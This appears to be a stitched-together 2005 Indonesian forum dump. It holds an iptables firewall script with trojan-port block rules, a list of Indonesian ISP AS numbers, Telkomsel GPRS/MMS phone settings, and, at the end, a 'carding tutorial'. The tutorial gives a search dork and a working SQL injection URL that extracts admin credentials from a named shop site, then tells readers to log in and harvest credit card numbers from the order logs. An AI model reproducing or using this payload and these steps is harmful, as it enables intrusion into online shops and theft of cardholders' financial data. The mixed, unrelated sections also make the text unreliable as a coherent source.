$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

#Set default policies to DROP

$IPTABLES -P INPUT DROP

$IPTABLES -P OUTPUT DROP

$IPTABLES -P FORWARD DROP

#----Set network sysctl options-----#

echo "Setting sysctl options"

#Enable forwarding in kernel

/proc/sys/net/ipv4/ip_forward

#Disabling IP Spoofing attacks.

/proc/sys/net/ipv4/conf/all/rp_filter

#Don´t respond to broadcast pings (Smurf-Amplifier-Protection)

/proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

#Block source routing

/proc/sys/net/ipv4/conf/all/accept_source_route

#Kill timestamps

/proc/sys/net/ipv4/tcp_timestamps

#Enable SYN Cookies

/proc/sys/net/ipv4/tcp_syncookies

#Kill redirects

/proc/sys/net/ipv4/conf/all/accept_redirects

#Enable bad error message protection

/proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

#Log martians (packets with impossible addresses)

/proc/sys/net/ipv4/conf/all/log_martians

#Set out local port range

/proc/sys/net/ipv4/ip_local_port_range

#Reduce DoS´ing ability by reducing timeouts

/proc/sys/net/ipv4/tcp_fin_timeout

/proc/sys/net/ipv4/tcp_keepalive_time

/proc/sys/net/ipv4/tcp_window_scaling

/proc/sys/net/ipv4/tcp_sack

echo " --- "

echo "Creating user-chains"

#----Create logging chains-----#

##These are the logging-chains. They all have a certain limit of log-entries/sec to prevent logflooding

##The syslog-entries will be fireparse-compatible (see http://www.fireparse.com)

#Invalid packets (not ESTABLISHED,RELATED or NEW)

$IPTABLES -N LINVALID

$IPTABLES -A LINVALID -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix

"fp=INVALID:1 a=DROP "

$IPTABLES -A LINVALID -j DROP

#TCP-Packets with one ore more bad flags

$IPTABLES -N LBADFLAG

$IPTABLES -A LBADFLAG -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=BADFLAG:1 a=DROP "

$IPTABLES -A LBADFLAG -j DROP

#Logging of connection attempts on special ports (Trojan portscans, special services, etc.)

$IPTABLES -N LSPECIALPORT

$IPTABLES -A LSPECIALPORT -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=SPECIALPORT:1 a=DROP "

$IPTABLES -A LSPECIALPORT -j DROP

#Logging of possible TCP-SYN-Floods

$IPTABLES -N LSYNFLOOD

$IPTABLES -A LSYNFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=SYNFLOOD:1 a=DROP "

$IPTABLES -A LSYNFLOOD -j DROP

#Logging of possible Ping-Floods

$IPTABLES -N LPINGFLOOD

$IPTABLES -A LPINGFLOOD -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=PINGFLOOD:1 a=DROP "

$IPTABLES -A LPINGFLOOD -j DROP

#All other dropped packets

$IPTABLES -N LDROP

$IPTABLES -A LDROP -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=TCP:1 a=DROP "

$IPTABLES -A LDROP -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=UDP:2 a=DROP "

$IPTABLES -A LDROP -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=ICMP:3 a=DROP "

$IPTABLES -A LDROP -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --logprefix

"fp=FRAGMENT:4 a=DROP "

$IPTABLES -A LDROP -j DROP

#All other rejected packets

$IPTABLES -N LREJECT

$IPTABLES -A LREJECT -p tcp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG

--log-prefix "fp=TCP:1 a=REJECT "

$IPTABLES -A LREJECT -p udp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=UDP:2 a=REJECT "

$IPTABLES -A LREJECT -p icmp -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j

LOG --log-prefix "fp=ICMP:3 a=REJECT "

$IPTABLES -A LREJECT -f -m limit --limit $LOGLIMIT --limit-burst $LOGLIMITBURST -j LOG --

log-prefix "fp=FRAGMENT:4 a=REJECT "

$IPTABLES -A LREJECT -p tcp -j REJECT --reject-with tcp-reset

$IPTABLES -A LREJECT -p udp -j REJECT --reject-with icmp-port-unreachable

$IPTABLES -A LREJECT -j REJECT

#----Create Accept-Chains-----#

#TCPACCEPT - Check for SYN-Floods before letting TCP-Packets in

$IPTABLES -N TCPACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -m limit --limit $TCPSYNLIMIT --limit-burst

$TCPSYNLIMITBURST -j ACCEPT

$IPTABLES -A TCPACCEPT -p tcp --syn -j LSYNFLOOD

$IPTABLES -A TCPACCEPT -p tcp ! --syn -j ACCEPT

#----Create special User-Chains-----#

#CHECKBADFLAG - Kill any Inbound/Outbound TCP-Packets with impossible flag-combinations

(Some port-scanners use these, eg. nmap Xmas,Null,etc.-scan)

$IPTABLES -N CHECKBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL FIN,URG,PSH -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL ALL -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags ALL NONE -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,RST SYN,RST -j LBADFLAG

$IPTABLES -A CHECKBADFLAG -p tcp --tcp-flags SYN,FIN SYN,FIN -j LBADFLAG

#FILTERING FOR SPECIAL PORTS

#Inbound/Outbound SILENTDROPS/REJECTS (Things we don´t want in our Logs)

#SMB-Traffic

$IPTABLES -N SMB

$IPTABLES -A SMB -p tcp --dport 137 -j DROP

$IPTABLES -A SMB -p tcp --dport 138 -j DROP

$IPTABLES -A SMB -p tcp --dport 139 -j DROP

$IPTABLES -A SMB -p tcp --dport 445 -j DROP

$IPTABLES -A SMB -p udp --dport 137 -j DROP

$IPTABLES -A SMB -p udp --dport 138 -j DROP

$IPTABLES -A SMB -p udp --dport 139 -j DROP

$IPTABLES -A SMB -p udp --dport 445 -j DROP

$IPTABLES -A SMB -p tcp --sport 137 -j DROP

$IPTABLES -A SMB -p tcp --sport 138 -j DROP

$IPTABLES -A SMB -p tcp --sport 139 -j DROP

$IPTABLES -A SMB -p tcp --sport 445 -j DROP

$IPTABLES -A SMB -p udp --sport 137 -j DROP

$IPTABLES -A SMB -p udp --sport 138 -j DROP

$IPTABLES -A SMB -p udp --sport 139 -j DROP

$IPTABLES -A SMB -p udp --sport 445 -j DROP

#Inbound Special Ports

$IPTABLES -N SPECIALPORTS

#Deepthroat Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 6670 -j LSPECIALPORT

#Subseven Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 1243 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p udp --dport 27374 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 6711:6713 -j LSPECIALPORT

#Netbus Scan

$IPTABLES -A SPECIALPORTS -p tcp --dport 12345:12346 -j LSPECIALPORT

$IPTABLES -A SPECIALPORTS -p tcp --dport 20034 -j LSPECIALPORT

#Back Orifice scan

$IPTABLES -A SPECIALPORTS -p udp --dport 31337:31338 -j LSPECIALPORT

#X-Win

$IPTABLES -A SPECIALPORTS -p tcp --dport $XWINPORTS -j LSPECIALPORT

#Hack´a´Tack 2000

$IPTABLES -A SPECIALPORTS -p udp --dport 28431 -j LSPECIALPORT

#ICMP/TRACEROUTE FILTERING

#Inbound ICMP/Traceroute

$IPTABLES -N ICMPINBOUND

#Ping Flood protection. Accept $PINGLIMIT echo-requests/sec, rest will be logged/dropped

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -m limit --limit $PINGLIMIT --

limit-burst $PINGLIMITBURST -j ACCEPT

#

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type echo-request -j LPINGFLOOD

#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPINBOUND -p icmp --icmp-type address-mask-reply -j LDROP

#Allow all other ICMP in

$IPTABLES -A ICMPINBOUND -p icmp -j ACCEPT

#Outbound ICMP/Traceroute

$IPTABLES -N ICMPOUTBOUND

#Block ICMP-Redirects (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type redirect -j LDROP

#Block ICMP-TTL-Expired

#MS Traceroute (MS uses ICMP instead of UDp for tracert)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-transit -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type ttl-zero-during-reassembly -j LDROP

#Block ICMP-Parameter-Problem

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type parameter-problem -j LDROP

#Block ICMP-Timestamp (Should already be catched by sysctl-options, if enabled)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type timestamp-reply -j LDROP

#Block ICMP-address-mask (can help to prevent OS-fingerprinting)

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-request -j LDROP

$IPTABLES -A ICMPOUTBOUND -p icmp --icmp-type address-mask-reply -j LDROP

##Accept all other ICMP going out

$IPTABLES -A ICMPOUTBOUND -p icmp -j ACCEPT

#----End User-Chains-----#

echo " --- "

#----Start Ruleset-----#

echo "Implementing firewall rules..."

#################

## INPUT-Chain ## (everything that is addressed to the firewall itself)

#################

##GENERAL Filtering

# Kill INVALID packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A INPUT -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A INPUT -p tcp -j CHECKBADFLAG

##Packets FROM FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A INPUT -i lo -j ACCEPT

#

Should be already catched by

kernel/rp_filter)

$IPTABLES -A INPUT -d 127.0.0.0/8 -j LREJECT

##Packets FROM INTERNAL NET

##Allow unlimited traffic from internal network using legit addresses to firewall-box

##If protection from the internal interface is needed, alter it

$IPTABLES -A INPUT -i $INTIF -s $INTLAN -j ACCEPT

Should be

already catched by rp_filter)

$IPTABLES -A INPUT -s $INTLAN -j LREJECT

##Packets FROM EXTERNAL NET

##ICMP & Traceroute filtering

#Filter ICMP

$IPTABLES -A INPUT -i $EXTIF -p icmp -j ICMPINBOUND

#Block UDP-Traceroute

$IPTABLES -A INPUT -p udp --dport 33434:33523 -j LDROP

##Silent Drops/Rejects (Things we don´t want in our logs)

#Drop all SMB-Traffic

$IPTABLES -A INPUT -i $EXTIF -j SMB

#Silently reject Ident (Don´t DROP ident, because of possible delays when establishing an

outbound connection)

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 20 -j TCPACCEPT

# ftp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 21 -j TCPACCEPT

# ssh

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 22 -j TCPACCEPT

#telnet

#$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 23 -j TCPACCEPT

# smtp

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 25 -j TCPACCEPT

# DNS

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 53 -j TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport 53 -j ACCEPT

# http

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 80 -j TCPACCEPT

# https

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 443 -j TCPACCEPT

# POP-3

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 110 -j TCPACCEPT

#SQUID

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport 3128 -j TCPACCEPT

$IPTABLES -t nat -A PREROUTING -i $EXTIF -p tcp --dport 80 -j REDIRECT --to-port 3128

##Separate logging of special portscans/connection attempts

$IPTABLES -A INPUT -i $EXTIF -j SPECIALPORTS

##Allow ESTABLISHED/RELATED connections in

$IPTABLES -A INPUT -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A INPUT -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED -j

TCPACCEPT

$IPTABLES -A INPUT -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED -j

ACCEPT

##Catch all rule

$IPTABLES -A INPUT -j LDROP

##################

## Output-Chain ## (everything that comes directly from the Firewall-Box)

##################

##Packets TO FIREWALL-BOX ITSELF

#Local IF

$IPTABLES -A OUTPUT -o lo -j ACCEPT

##Packets TO INTERNAL NET

#Allow unlimited traffic to internal network using legit addresses

$IPTABLES -A OUTPUT -o $INTIF -d $INTLAN -j ACCEPT

##Packets TO EXTERNAL NET

##ICMP & Traceroute

$IPTABLES -A OUTPUT -o $EXTIF -p icmp -j ICMPOUTBOUND

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A OUTPUT -o $EXTIF -j SMB

#Ident

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 113 -j REJECT --reject-with tcp-reset

##Public services running ON FIREWALL-BOX (comment out to activate):

# ftp-data

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 20 -j ACCEPT

# ftp

#$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 21 -j ACCEPT

# ssh

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

#telnet

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 23 -m state --state ESTABLISHED -j ACCEPT

# smtp

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT

# DNS

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 53 -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -p udp --sport 53 -j ACCEPT

# http

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

# https

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

# POP-3

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT

# Squid

$IPTABLES -A OUTPUT -o $EXTIF -p tcp --sport 3128 -m state --state ESTABLISHED -j

ACCEPT

##Accept all tcp/udp traffic on unprivileged ports going out

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p tcp --sport $UNPRIVPORTS -j ACCEPT

$IPTABLES -A OUTPUT -o $EXTIF -s $EXTIP -p udp --sport $UNPRIVPORTS -j ACCEPT

##Catch all rule

$IPTABLES -A OUTPUT -j LDROP

####################

## FORWARD-Chain ## (everything that passes the firewall)

####################

##GENERAL Filtering

#Kill invalid packets (not ESTABLISHED, RELATED or NEW)

$IPTABLES -A FORWARD -m state --state INVALID -j LINVALID

# Check TCP-Packets for Bad Flags

$IPTABLES -A FORWARD -p tcp -j CHECKBADFLAG

##Filtering FROM INTERNAL NET

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A FORWARD -o $EXTIF -j SMB

##Special Drops/Rejects

# - To be done -

##Filter for some Trojans communicating to outside

# - To be done -

##Port-Forwarding from Ports Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -o $EXTIF -s $HTTPIP -p tcp --sport 80 -j ACCEPT

1024) from Internal Net to External Net

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p tcp --sport $UNPRIVPORTS -j

ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p udp --sport $UNPRIVPORTS -j

ACCEPT

$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -s $INTLAN -p icmp -j ACCEPT

##Filtering FROM EXTERNAL NET

##Silent Drops/Rejects (Things we don´t want in our logs)

#SMB

$IPTABLES -A FORWARD -i $EXTIF -j SMB

##Allow replies coming in

$IPTABLES -A FORWARD -i $EXTIF -m state --state ESTABLISHED -j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p tcp --dport $UNPRIVPORTS -m state --state RELATED

-j TCPACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p udp --dport $UNPRIVPORTS -m state --state RELATED

-j ACCEPT

$IPTABLES -A FORWARD -i $EXTIF -p icmp -m state --state RELATED -j ACCEPT

Also see chain PREROUTING)

#HTTP-Forwarding

#$IPTABLES -A FORWARD -i $EXTIF -p tcp -d $HTTPIP --dport 80 -j ACCEPT

#Battlecom-Forwarding

#$IPTABLES -A FORWARD -p tcp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p udp --dport 2300:2400 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

#$IPTABLES -A FORWARD -p tcp --dport 47624 -i $EXTIF -d $BATTLECOMIP -j ACCEPT

##Catch all rule/Deny every other forwarding

$IPTABLES -A FORWARD -j LDROP

################

## PREROUTING ##

################

Also see chain FORWARD)

##HTTP

#$IPTABLES -A PREROUTING -t nat -i $EXTIF -p tcp -d $EXTIP --dport 80 -j DNAT --to

$HTTPIP

##Battlecom

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 2300:2400 -i $EXTIF -j

DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p udp --destination-port 2300:2400 -i $EXTIF -j

DNAT --to $BATTLECOMIP

#$IPTABLES -t nat -A PREROUTING -d $EXTIP -p tcp --destination-port 47624 -i $EXTIF -j

DNAT --to $BATTLECOMIP:47624

###################

## POSTROUTING ##

###################

#Masquerade from Internal Net to External Net

$IPTABLES -A POSTROUTING -t nat -o $EXTIF -j MASQUERADE

#------End Ruleset------#

echo "...done"

echo ""

IPTABLES firewall loaded/activated

##--------------------------------End Firewall---------------------------------##

;;

*)

echo "Usage: firewall (start|stop|restart|status) EXTIF INTIF"

exit 1

esac

exit 0

Menu tambahan

#############

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128

IDC (Cyber Building) IIX-JKT2 GCC (Telkom Building) IIX-JKT1

ISP AS Number Connection ISP AS Number Connection

- Jasatel AS 9785 FastEther - AccessNet AS 7587 Ethernet

- Starcall AS 9251 FastEther - RadNet AS 4434 Ethernet

- Nusanet AS 23679 FastEther - Centrin AS 9326 Ethernet

- Thamrin AS 23952 FastEther - Mahatel AS 7083 Ethernet

- Mitranet AS 23691 FastEther - Idola AS 4800 Ethernet

- IconPLN AS 9341 FastEther

- VIPnet AS 23698 FastEther Napinfo (Kuningan) IIX-JKT3

- Napsindo AS 17907 FastEther ISP AS Number Connection

- The.Net AS 10208 FastEther - Napinfo AS 17727 FastEther

- Gen.ID AS 23950 FastEther - Inter.net AS 18103 FastEther

- GerbangNet AS 18251 FastEther - Asianet AS 10114 FastEther

- Elga AS 23695 FastEther - Orbicom AS 23948 FastEther

- FirstAsia AS 23696 FastEther - Radnet AS 4434 FastEther

- EzyNet AS 18056 FastEther

- BNA AS 18189 FastEther

- TripleGate AS 17910 FastEther

- CSM AS 18379 FastEther

- Padinet AS 23756 FastEther

- Reach AS 4637 FastEther

- Uninet AS 17884 FastEther

- SatNet AS 17826 FastEther

- Multidata AS 18153 FastEther

- Melsa.net AS 9657 FastEther

- KSNet AS 18112 FastEther

- JavaNet AS 18393 FastEther

- IptekNet AS 3583 FastEther

- SpeedNet AS 9251 FastEther

- Patrakom AS 10137 FastEther

- Angkasa AS17450 FastEther

- Solusi AS 17995 FastEther

- GPNet AS 18394 FastEther

- SpotNet AS 4833 FastEther

- Jogjamedianet AS 23671 FastEther

- IPnet AS 18347 FastEther

- Rainbow AS 23945 FastEther

- Central AS 9228 FastEther

- Exelcom AS17885 FastEther

- UIInet AS 17996 FastEther

- BizNet AS 17451 FastEther

- Indika AS 23694 FastEther

- Quasar AS 18364 FastEther

- Eranet AS 17440 FastEther

- Easynet AS 23651 FastEther

- TopNet AS 23946 FastEther

- LinkNet AS 9905 FastEther

- InfoAsia AS 10220 FastEther

- Indonet AS 9340 FastEther

- CBN AS 4787 FastEther

- Indosat AS 4795 FastEther

- Visionnet AS 18237 FastEther

- Dnet AS 9794 FastEther

- Idola AS 4800 FastEther

- KadinNet Static FastEther

- Jalawave AS 23697 FastEther

- PSN AS 9875 FastEther

- Jetscom AS17671 FastEther

- Infokom AS17670 FastEther

- Bolehnet AS 9462 FastEther

- DTP AS18059 FastEther

- Kabelvision AS 23700 FastEther

- NTT Indonesia AS 10217 FastEther

- Satelindo AS 17922 FastEther

- Okenet AS 4832 FastEther

- TelkomNet AS 17974 FastEther

- PacificNet AS 4855 FastEther

- Infonet AS 2008 FastEther

- Asiakomnet AS 18052 FastEther

- Commercenet Static FastEther

- JII AS 17800 FastEther

- NAP Info AS 17727 FastEther

- AsiaNet AS 10114 FastEther

- Inter.net AS 18103 FastEther

- CityNet AS 17769 FastEther

- Radnet AS 4434 FastEther

- Centrin AS 9326 FastEther

- Bitnet AS 18156 FastEther

- IPTK AS 23699 FastEther

- Telkomsel AS 23693 FastEther

- Estiko AS 23692 Serial

- Qita Static Serial

- Sistelindo AS 2687 Serial

- PrimaNet AS 17658 Serial

- Internux Static Serial

- Teras AS 4821 Serial

- Circlecom AS 17538 Serial

Post by : No_Name on [ 26 October 2005 07:57:07 ]

Setting GPRS

Setting manual MMS via GPRS Telkomsel

Setting manual MMS via GPRS Telkomsel untuk Siemens A65, CF62, C60, M55, MC60, S55,

SL55

Langkah 1: Membuat Setting GPRS

1. Tekan Menu

2. Pilih Setup

3. Pilih Connectivity

4. Pilih GPRS lalu berikan tanda √

5. Pilih Data Services

6. Pilih MMS , WAP

7. Pilih 1 atau tempat lain

7a. Mengganti nama:

- Tekan Option

- Tekan Rename

- Masukkan : MMS Telkomsel

- Tekan Save

7b. Tekan Edit lalu Tekan Yes

8. Pilih GPRS Settings

8a. Berikan tanda √ pada GPRS Settings

8b. Pilih Edit

9. Isilah parameter sebagai berikut:

- APN : mms

- Login : wap

- Password : wap123

10. Tekan Save

11. Lanjutkan ke langkah 2

Langkah 2 : Setting MMS

1. Tekan Menu

2. Pilih Message

3. Pilih Msg. setup

4. Pilih MMS profiles

5. Pilih MMS atau tempat lainnya.

5a. Mengganti nama :

- Tekan Options

- Tekan Rename

- Masukkan : MMS Telkomsel

- Tekan OK

5b. Tekan Options, Tekan Change sett.

6. Isilah parameter sebagai berikut:

- Expiry time : Maximum

- Def. Priority : Normal

- Def. duration : 010.0

- Retrieval : Automatic

- MMS Relaysrv. : http://mms.telkomsel.com

- IP Settings : 010.001.089.150

Port : 9201

2 nd port dan 2 nd address tidak perlu diisi

- Conn. profile : Pilih MMS Telkomsel

7. Selesai

Post by : Siemens on [ 24 October 2005 11:23:47 ]

tutorial carding

Tutorial Carding by god_army

Disini saya mau berbagi sedikit tentang tutorial seputar carding yang mana menggunakan script

yang mengexploitasi terhadap web yang masih vuln terhadap script yang saya buat.

Sebenarnya script itu masih bisa di modifikasi lagi yah sesuai kebutuhan aza tapi itu terserah

saudara ... hehe..hehe.

Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari

di cari di google dengan keyword :

/shop/shopdisplayproducts.asp atau

shopdisplayproducts.asp

?cat=´%

20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%

20tbluser))--sp_password

Misalnya kita dapet target www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui

Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :

www.masih-vuln.com/shopdisplayproducts.asp?cat=´%20and%201=convert(int,(select%20top%

201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

Der apa yang terjadi ...? Kok gx ada yang terjadi malahan keluar

The page cannot be found

The page you are looking for might have been removed, had its name changed, or is temporarily

unavailable.

--------------------------------------------------------------------------------

Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh.

Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita

tinggal login pake username and password hasil temuan kita tadi.

Sebagai contoh web yang masih vuln adalah :

http://www.ilovesport.com.au jadinya :

http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat=´%20and%201=convert(int,

(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake

username ama password tersebut di

http://www.ilovesport.com.au/shop/admin.asp

hehehehe ... heheheheh

berhasil khan ....

abis itu masuk ke order lognya terus lo cari deh cartu creditnya disana.

hihihihhihi semoga sukses dah.

Thank´s to Mysister Savira_intania yang udah ingetin gw untuk tobat dari nyolongin cc orang

hihihih.